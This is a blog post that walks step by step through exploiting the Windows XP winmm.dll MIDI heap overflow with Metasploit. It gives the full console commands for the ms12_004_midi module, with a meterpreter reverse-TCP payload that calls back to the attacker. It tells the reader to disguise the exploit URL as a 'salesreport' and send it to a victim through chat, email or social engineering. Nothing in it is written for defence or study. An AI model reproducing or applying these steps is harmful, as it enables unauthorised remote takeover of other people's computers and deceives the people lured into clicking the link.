Saturday, September 29, 2012

Hack Remote XP using Heap Overflow Attack

This module exploits heap overflow vulnerability in the Windows Multimedia Library (winmm.dll). The vulnerability occurs when parsing specially crafted MIDI files. Remote code execution can be achieved by using the Windows Media Player ActiveX control. Exploitation is done by supplying a specially crafted MIDI file with specific events, causing the offset calculation being higher than what is available on the heap (0×400 allocated by WINMM!winmmAlloc), and then allowing us to either “inc al” or “dec al” a byte. This can be used to corrupt an array (CImplAry) we setup, and force the browser to confuse types from tagVARIANT objects, which leverages remote code execution under the context of the user. Note: At this time, for IE 8 target, you may either choose the JRE ROP, or the msvcrt ROP to bypass DEP (Data Execution Prevention). Also, based on our testing, the vulnerability does not seem to trigger when the victim machine is operated via rdesktop.

Exploit Targets


Windows XP service pack 2

Windows XP service pack 3

Requirement



Attacker: metasploit

Victim PC: Windows XP

Open backtrack terminal type

msfconsole


Now type

use exploit/windows/browser/ms12_004_midi

Msf exploit (ms12_004_midi)>set payload windows/meterpreter/reverse_tcp

Msf exploit (ms12_004_midi)>set lhost 192.168.1.4 (IP of Local Host)

Msf exploit (ms12_004_midi)>set port 4444 (Port of Local PC)

Msf exploit (ms12_004_midi)>set srvhost 192.168.1.4 (This must be an address on the local machine)

Msf exploit (ms12_004_midi)>set srvport 80 (The local port to listen on default: 8080)

Msf exploit (ms12_004_midi)>set uripath salesreport (The Url to use for this exploit)

Msf exploit (ms12_004_midi)>exploit


Now an URL you should give to your victim http://192.168.1.4/salesreport

Send the link of the server to the victim via chat or email or any social engineering technique.

Now you have access to the victims PC. Use “sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“

No comments:

Post a Comment